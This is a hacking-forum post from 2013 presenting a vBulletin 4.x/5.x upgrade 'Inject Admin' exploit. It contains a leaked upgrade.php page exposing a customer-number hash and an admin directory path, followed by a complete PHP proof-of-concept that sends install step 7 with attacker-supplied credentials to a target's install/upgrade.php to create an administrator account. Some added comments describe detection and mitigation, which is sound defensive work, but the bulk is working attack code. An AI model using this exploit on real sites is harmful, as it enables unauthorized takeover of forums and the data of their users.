     
    #11
    my weapons turn me into a m0nde's Avatar
    proof:

    Code:
    		<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    		<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
    		<head>
    			<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
    			<meta http-equiv="Expires" content="Sat, 26 Jul 1997 05:00:00 GMT" />
    			<meta http-equiv="Pragma" content="no-cache, must-revalidate" />
    			<title>vBulletin 4.2.0 Upgrade System </title>
    			<link rel="stylesheet" href="../cpstyles/vBulletin_3_Silver/controlpanel.css" />
    			<style type="text/css">
    			body {
    				margin:0;
    			}
    			#vb_overlay_background {
    				opacity:0.50;
    				-moz-opacity:0.50;
    				filter:alpha(opacity=50);
    				background-color:#000000;
    				z-index:10;
    				position:fixed;
    				top:0px;
    				left:0px;
    				width:100%;
    				height:100%;
    			}
    			#header {
    				border:outset 2px;
    				display:block;
    				padding:5px;
    			}
    
    			.floatcontainer:after {
    				content: ".";
    				display: block;
    				height: 0;
    				clear: both;
    				visibility: hidden;
    			}
    			.floatcontainer {
    				display:inline-block;
    			}
    
    			/* IE-Mac hide \*/
    			* html .floatcontainer {
    				height:1%;
    			}
    			.floatcontainer {
    				display:block;
    			}
    			.floatcontainer.hidden {
    				display:none;
    			}
    			/* End IE-Mac hide */
    
    			#header div.logo {
    				width:160px;
    				float:left;
    			}
    			#header div.notice {
    				padding-left:220px;
    				padding-top:18px;
    			}
    
    			#header div.xml1 {
    				float:right;
    				text-align:right;
    				padding-top:5px;
    			}
    			#header div.xml2 {
    				float:right;
    				text-align:left;
    				padding-top:5px;
    				padding-right:10px;
    				margin-left:15px;
    			}
    			#header div.xml1 ul, #header div.xml2 ul {
    				list-style-type:none;
    				margin:0;
    				padding:0;
    				font-size: 11px;
    				font-family: tahoma, verdana, arial, helvetica, sans-serif;
    			}
    			#all {
    				margin: 10px;
    			}
    			#all p, #all td, #all li, #all div {
    				font-size: 11px;
    				font-family: verdana, arial, helvetica, sans-serif;
    			}
    
    			#confirm, #prompt {
    				z-index:11;
    				position:absolute;
    			}
    
    			#prompt div.input {
    				display:block;
    			}
    
    			#progressbox, #mismatch, #authenticate, #prompt, #confirm, #startup_errors {
    				width:375px;
    				text-align:center;
    				margin-left:auto;
    				margin-right:auto;
    				margin-top:20px;
    			}
    
    			#startup_errors {
    				overflow:hidden;
    				max-height:400px;
    				_height:400px;				
    			}
    			
    			#startup_errors .messagebody
    			{
    				text-align:left;
    				padding:10px;
    				overflow:auto;
    				max-height:330px;
    				_height:330px;
    			}
    
    			#startup_errors form {
    				margin:0;
    				padding:5px;
    			}
    			
    			#startup_errors input[type="submit"] {
    				margin:0;
    			}
    			
    			#startup_errors li img {
    				width:0;
    			}
    			
    			#promptmessage, #confirmmessage {
    				padding:10px;
    				text-align:left;
    				overflow:auto;
    				max-height:400px;
    			}
    
    			#progresssection .buttons {
    				text-align:left;
    			}
    
    			.messageheader {
    				padding:5px;
    				font-weight:bold;
    				text-align:center;
    			}
    
    			.submit, .messagebody {
    				padding:5px;
    			}
    
    			.advancedconfirmbody {
    				padding-left:10px;
    				padding-right:10px;
    			}
    
    			.advancedconfirm .messagebody{
    				padding:0;
    			}
    
    			.advancedconfirm #confirmmessage {
    				padding:0;
    			}
    
    			.list_no_decoration {
    				list-style-type:none;
    				margin:0px;
    				padding:0px;
    			}
    
    			#detailbox {
    				margin: 20px auto;
    				width:375px;
    			}
    
    			#promptresponse {
    				width:90%;
    			}
    
    			#customerid {
    				width:250px;
    				font-weight:bold;
    				display:block;
    		    margin:10px auto 0 auto;
    			}
    
    			#customerid_error {
    				margin:10px 0;
    				padding:3px;
    			}
    
    			input[type="submit"] {
    				margin-top:10px;
    			}
    
    			#mainmessage {
    				height:300px;
    				overflow:auto;
    				padding-bottom:10px;
    			}
    
    			#mainmessage > ul > li {
    				margin-left:25px;
    				text-indent:-25px;
    			}
    
    			#mainmessage > ul > li ol,
    			#mainmessage > ul > li.noindent {
    				margin-left:0;
    				text-indent:0;
    			}
    
    			#mainmessage li.querystatus {}
    
    			#upgradeprogress {
    				margin-right:10px;
    				margin-top:4px;
    				float:right;
    				vertical-align:middle;
    			}
    
    			#progressbar_container {
    				border:1px outset;
    				height:16px;
    				width:95%;
    				margin:10px auto;
    				background-color:#FFFFFF;
    				text-align:left;
    			}
    
    			#progressbar {
    				width:0;
    				height:15px;
    				padding-top:1px;
    				background-color:#CCCCCC;
    				text-align:right;
    				overflow:auto;
    				float:left;
    			}
    
    			#progressbar span {
    				margin-right: 2px;
    			}
    
    			#percentageout {
    				margin-left: 2px;
    				padding-top:1px;
    				float:left;
    			}
    
    			#showdetails, #hidedetails {
    				margin-left: 7px;
    			}
    
    			#beginsection {
    				#padding-bottom:10px;
    			}
    
    			#confirmform, #promptform {
    				padding:0;
    				margin:0;
    			}
    
    			#optionsbox {
    				text-align:left			}
    			
    			.hidden {
    				display:none;
    			}
    
    			.usererror {
    				display:block;
    				color:red;
    			}
    
    			.usererror.hidden {
    				display:none;
    			}
    
    			.lbinstallselect {
    				max-width:180px;
    				_width:180px;
    			}
    
    			div.consolemsg {
    				text-align:left;
    				padding:10px;
    			}
    
    			div.consolemsg ul li {
    				font-weight:bold;
    				list-style-type:none;
    			}
    }
    
    			</style>
    			<script type="text/javascript">
    			<!--
    				// Settings that upgrade.php writes into the page for the client-side upgrade scripts.
    				// They are part of the HTML response, so whoever can request this page can read them.
    				var IMGDIR_MISC = "../cpstyles/vBulletin_3_Silver";
    				var CLEARGIFURL = "./clear.gif";
    				// NOTE(review): CUSTNUMBER is already filled in although the only panel of this page
    				// without the "hidden" class is the "Please Enter Your Customer Number" form, i.e. the
    				// value is sent before the visitor has supplied anything. It is 32 hex characters
    				// (the length of an MD5 digest); presumably a digest of the licence customer number,
    				// TODO confirm. If the server accepts this same string as customerid, the prompt
    				// protects nothing: keep the install directory off a production site (delete it after
    				// the upgrade, or deny access to it at the web server).
    				var CUSTNUMBER = "a0ec1a9dca589d3b988311afaa570d29";
    				var VERSION = "";
    				// Empty here; the hidden form fields further down carry step/startat/only as "0".
    				var SCRIPTINFO = {
    					version: "",
    					startat: "",
    					step   : "",
    					only   : ""
    				};
    				// ADMINDIR hands the relative path of the admin control panel to whoever loads this page.
    				var ADMINDIR = "../bossflight";
    				var TOTALSTEPS = 0;
    				var ABORTMSG = "Status: Aborted";
    				var UNEXPECTED_TEXT = "<strong>Unexpected Text:</strong><pre>%1$s</pre>";
    				var SETUPTYPE = "upgrade";
    				var STEP_X_Y = "Step %1$s - %2$s";
    				var SERVER_NO_RESPONSE = "The server returned no response. This is probably due to a timeout setting. Please contact vBulletin Support for assistance";
    			//-->
    			</script>
    			<script type="text/javascript" src="../clientscript/yui/yuiloader-dom-event/yuiloader-dom-event.js"></script>
    			<script type="text/javascript" src="../clientscript/yui/connection/connection-min.js"></script>
    			<script type="text/javascript" src="../clientscript/vbulletin-core.js"></script>
    		</head>
    		<body>
    		<div id="vb_overlay_background" class="hidden"></div>
    		<div id="header" class="navbody floatcontainer">
    			<div class="xml2">
    				<ul>
    					<li id="vb_style_version">4.2.0</li>
    					<li id="vb_mobile_style_version">4.2.0</li>
    					<li id="vb_settings_version">4.2.0</li>
    					<li id="vb_language_version">4.2.0</li>
    					<li id="vb_navigation_version">4.2.0</li>
    					<li id="vb_admin_help_version">4.2.0</li>
    				</ul>
    			</div>
    			<div class="xml1">
    				<ul>
    					<li>vbulletin-style.xml:</li>
    					<li>vbulletin-mobile-style.xml:</li>					
    					<li>vbulletin-settings.xml:</li>
    					<li>vbulletin-language.xml:</li>
    					<li>vbulletin-navigation.xml:</li>
    					<li>vbulletin-adminhelp.xml:</li>
    				</ul>
    			</div>
    			<div class="logo">
    				<img src="../cpstyles/vBulletin_3_Silver/cp_logo.gif" alt="" title="vBulletin 4 &copy; 2013 vBulletin Solutions, Inc. All rights reserved." />
    			</div>
    			<div class="notice">
    				<strong>vBulletin <span id="vb_version">4.2.0</span> Upgrade System</strong><br />
    				(Please be patient as some parts may take some time)			</div>
    		</div>
    
    		<div id="all">
    			<div class="tborder hidden" id="startup_errors">
    				<div class="navbody messageheader">Startup Errors</div>
    				<div class="messagebody logincontrols">
    					Due to the following errors, the install/upgrade can not continue:					<ul>
    						<li class="hidden"></li>
    											</ul>				
    				</div>
    				<form action="upgrade.php" method="post" id="submitconfirmform" class="status hidden">
    					<input class="button" type="submit" name="submit" tabindex="1" accesskey="s" id="submitconfirmok" value="Ignore and Continue" />
    				</form>					
    			</div>
    			
    			<div class="tborder" id="authenticate">
    				<!-- Customer-number gate: the only panel in this response without the "hidden" class.
    				     The customerid text field is the sole credential this form collects. -->
    				<div class="navbody messageheader">Please Enter Your Customer Number</div>
    				<div class="messagebody logincontrols">
    					This is the number with which you log in to the vBulletin.com Members' Area					<form action="upgrade.php" method="post">
    						<input type="text" tabindex="1" value="" name="customerid" id="customerid" />
    												<input class="button" type="submit" tabindex="1" accesskey="s" id="authsubmit" value="Enter Upgrade System" />
    						
    			<!-- step, startat and only travel as hidden fields, so the client chooses their values;
    			     the server side has to check the customer number and the step order on every request. -->
    			<input type="hidden" name="step" value="0" />
    			<input type="hidden" name="startat" value="0" />
    			<input type="hidden" name="only" value="0" />
    							</form>
    				</div>
    			</div>
    			
    			<div class="tborder hidden" id="mismatch">
    				<div class="navbody messageheader">Version Mismatch</div>
    				<div class="messagebody logincontrols">
    					Your upgrade log shows that your last upgrade was to version  but you are currently on version 4.2.0.					<form action="upgrade.php" method="post">
    						<input type="hidden" name="mismatch" value="1" />
    						<label for="version1"><input id="version1" type="radio" name="version" value="" />Upgrade from </label>
    						<label for="version2"><input id="version2" type="radio" name="version" value="4.2.0" />Upgrade from 4.2.0</label>
    						<input class="button" type="submit" tabindex="1" accesskey="s" name="" value="Enter Upgrade System" />
    						
    			<input type="hidden" name="step" value="0" />
    			<input type="hidden" name="startat" value="0" />
    			<input type="hidden" name="only" value="0" />
    							</form>
    				</div>
    			</div>
    
    			<div class="tborder hidden" id="progressbox">
    				<div class="navbody messageheader"></div>
    				<div class="messagebody logincontrols">
    					<div class="hidden" id="progresssection">
    						<div id="progressmessage"></div>
    						<div id="progressbar_container">
    							<div id="progressbar"></div>
    							<div id="percentageout"></div>
    						</div>
    						<div id="progressnotice"></div>
    						<div class="buttons floatcontainer">
    							<img id="upgradeprogress" class="hidden" src="../cpstyles/vBulletin_3_Silver/progress.gif" alt="" />
    							<input class="button" type="button" id="showdetails" tabindex="1" name="" value="Show Details" />
    							<input class="button hidden" type="button" id="hidedetails" tabindex="1" name="" value="Hide Details" />
    							<input class="button hidden" type="button" id="admincp" tabindex="1" name="" value="Admin CP" />
    							<input class="button hidden" type="button" id="querystatus" tabindex="1" name="" value="Query Status" />
    						</div>
    					</div>
    					<div id="beginsection">
    						<form action="upgrade.php" id="optionsform" method="post">
    														<p></p>
    							<input type="hidden" name="jsfail" value="1" />
    							<div class="hidden" id="optionsbox">
    								<table cellspacing="0" cellpadding="4" border="0" align="center" width="100%" id="cpform_table" class="" style="border-collapse: separate;">
    								<tbody>
    									<tr>
    										<td class="alt1">
    											Merge Template Updates										</td>
    										<td class="alt1">
    											Yes <input id="rb_merge1" type="radio" name="options[skiptemplatemerge]" value="0" checked="checked" />
    											No <input id="rb_merge2" type="radio" name="options[skiptemplatemerge]" value="1" />
    										</td>
    									</tr>
    								</tbody>
    								</table>
    							</div>
    							<input class="button" type="submit" id="beginupgrade" tabindex="1" name="" value="" />
    							<input class="button" type="submit" id="options" tabindex ="2" name="" value="Options" />
    					</form>
    					</div>
    				</div>
    			</div>
    
    			<div id="detailbox" class="tborder hidden">
    				<div class="navbody messageheader"></div>
    				<div id="mainmessage" class="messagebody logincontrols"></div>
    				<div class="status">
    					<span id="statusmessage"></span>
    				</div>
    			</div>
    
    			<div class="tborder hidden" id="prompt">
    				<div class="navbody messageheader" id="prompttitle">Action Required</div>
    				<div class="messagebody logincontrols">
    					<div id="promptmessage"></div>
    					<form action="upgrade.php" method="post" id="promptform">
    						<input type="text" tabindex="1" value="" name="promptresponse" id="promptresponse" />
    						<div class="submit">
    							<input class="button" type="submit" name="submit" tabindex="1" accesskey="s" id="promptsubmit" value="OK" />
    							<input class="button hidden" type="reset" name="reset" tabindex="1" id="promptreset" value="Reset" />
    							<input class="button hidden" type="submit" name="submit" tabindex="1" accesskey="s" id="promptcancel" value="Cancel" />
    						</div>
    					</form>
    				</div>
    			</div>
    
    			<div class="tborder hidden" id="confirm">
    				<div class="navbody messageheader" id="confirmtitle">Action Required</div>
    				<div class="messagebody logincontrols">
    					<form action="upgrade.php" method="post" id="confirmform">
    						<div id="confirmmessage"></div>
    						<div class="submit">
    							<input class="button" type="submit" name="submit" tabindex="1" accesskey="s" id="confirmok" value="OK" />
    							<input class="button hidden" type="reset" name="reset" tabindex="1" id="confirmreset" value="Reset" />
    							<input class="button" type="button" name="cancel" tabindex="1" accesskey="s" id="confirmcancel" value="Cancel" />
    						</div>
    					</form>
    				</div>
    			</div>
    
    		</div>
    
    		<p align="center"><a href="http://www.vbulletin.com/" target="_blank" class="copyright">
    		vBulletin v4.2.0, Copyright &copy; 2013 vBulletin Solutions, Inc. All rights reserved.		</a></p>
    		<script type="text/javascript" src="vbulletin-upgrade.js"></script>
    		</body>
    		</html>
    Code:
    <html xmlns="http://www.w3.org/1999/xhtml"><head> 
     
     
     
     
     
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> 
     
    <title>vBulletin 0day</title> 
     
    <style type="text/css"> 
     
    <!--
     
    body {
     
        background-color: #000;
     
        text-align: center;
     
        color: #063;
     
        font-size: large;
     
    }
     
    .a {    font-size: 24px;
     
    }
     
    .f {    color: #060;
     
    }
     
    .gbf {    color: #F00;
     
    }
     
    .dd {
     
        color: #F00;
     
    }
     
    .w {
     
        font-size: large;
     
    }
     
    a:link {
     
        text-decoration: none;
     
    }
     
    a:visited {
     
        text-decoration: none;
     
    }
     
    a:hover {
     
        text-decoration: none;
     
    }
     
    a:active {
     
        text-decoration: none;
     
    }
     
    -->
     
    </style></head><body> 
     
    <p class="a">
    
     
    <h1><span class="gbf">vBulletin</span> 4.x.x and 5.x.x Upgrade 0day Exploit</h1> 
     
    <br>Created by: 1337
    <br>Found on: 08/22/2013
    <br>Website: http://www.madleets.com
    </p> 
    
    <br>
    <?php
    // Form handler of the posted proof-of-concept: when the form below is submitted it sends one
    // POST to the URL typed into the form and then exits.
    // NOTE(review): the field names mirror the upgrade page's own form (customerid, step, startat,
    // only, options[skiptemplatemerge]); step 7 of version "install" together with the
    // htmldata[...] account fields is presumably the installer's administrator-creation step,
    // as the "Inject Admin" button label suggests. TODO confirm against the vendor advisory.
    //
    // Detection: in web-server or WAF logs this appears as a POST to the forum's
    // install/upgrade.php path carrying ajax=1, version=install, step=7, htmlsubmit=1 and
    // htmldata[...] keys in the body, plus a bbcustomerid cookie. Seeing the body requires
    // request-body logging; the path and method alone are visible in ordinary access logs.
    // Mitigation: remove the install directory once setup or upgrade is finished, or restrict it
    // at the web server, and review the administrator list for accounts nobody recognises.
    //extract data from the post
    if(isset($_POST['submit'])){
    // extract() on raw $_POST lets the request define arbitrary local variables in this script.
    extract($_POST);
    //set POST variables
    $url = $_POST['url'];
    // Every value is fixed except customerid and the four account fields taken from the form.
    $fields = array(
                            'ajax' => urlencode('1'),
                            'version' => urlencode('install'),
                            'checktable' => urlencode('false'),
                            'firstrun' => urlencode('false'),
                            'step' => urlencode('7'),
                            'startat' => urlencode('0'),
                            'only' => urlencode('false'),
                            'customerid' => urlencode($_POST['customerid']),
                            'options[skiptemplatemerge]' => urlencode('0'),
                            'response' => urlencode('yes'),
                            'htmlsubmit' => urlencode('1'),
                            'htmldata[username]' => urlencode($_POST['username']),
                            'htmldata[password]' => urlencode($_POST['password']),
                            'htmldata[confirmpassword]' => urlencode($_POST['password']),
                            'htmldata[email]' => urlencode($_POST['email'])
                    );
    //url-ify the data for the POST
    foreach($fields as $key=>$value) { $fields_string .= $key.'='.$value.'&'; }
    rtrim($fields_string, '&');
    //open connection
    $ch = curl_init();
    //set the url, number of POST vars, POST data
    curl_setopt($ch,CURLOPT_URL, $url);
    curl_setopt($ch,CURLOPT_POST, count($fields));
    curl_setopt($ch,CURLOPT_POSTFIELDS, $fields_string);
    curl_setopt($ch, CURLOPT_COOKIESESSION, TRUE);
    // The same customerid value is sent a second time, as the bbcustomerid cookie.
    curl_setopt($ch, CURLOPT_COOKIE, 'bbcustomerid='.$_POST['customerid'] );
    //execute post
    // CURLOPT_RETURNTRANSFER is not set, so curl_exec() writes the remote response into this page.
    $result = curl_exec($ch);
    //close connection
    curl_close($ch);
    exit();
    }
    ?>
    <center>
    <!-- Input form of the proof-of-concept; it posts back to this same script, whose PHP block
         reads url, customerid, username, password and email from the request.
         NOTE(review): the action attribute prints $_SERVER['REQUEST_URI'] without
         htmlspecialchars(), so the request URI is reflected into the markup unescaped. -->
    <form name="sploit" method="POST" action="<?php echo $_SERVER['REQUEST_URI']; ?>">
    <span>Example:http://rubycalaber.com/forum/install/upgrade.php</span><br>
      <span>Website:</span>
        <input name="url" type="text" tabindex="1" size="60" />
        <br>
        <span>Customer ID:</span>
        <input name="customerid" type="text" tabindex="2" size="40" />
        <br>
        <span>Username:</span>
        <input name="username" type="text" tabindex="3" size="40" />
        <br>
        <span>Password:</span>
        <input name="password" type="text" tabindex="4" size="40" />
        <br>
        <span>Email:</span>
        <input name="email" type="text" tabindex="5" maxlength="40" />
        
    <input name="submit" type="submit" value="Inject Admin">
    </form>
    </center>
     
    <p class="a">------------------------------------------------------------------------------------------------------------------</p> 
     
    <p class="a">MaDLeeTs TeaM </p> 
     
    <p class="a">------------------------------------------------------------------------------------------------------------------</p> 
     
    
    </div>
            
     </pre> 
     
    <p class="a">&nbsp;</p> 
    <p align="center"> 
     
    
      </body></html>
    Last edited by m0nde; 09-16-2013 at 01:05 PM.
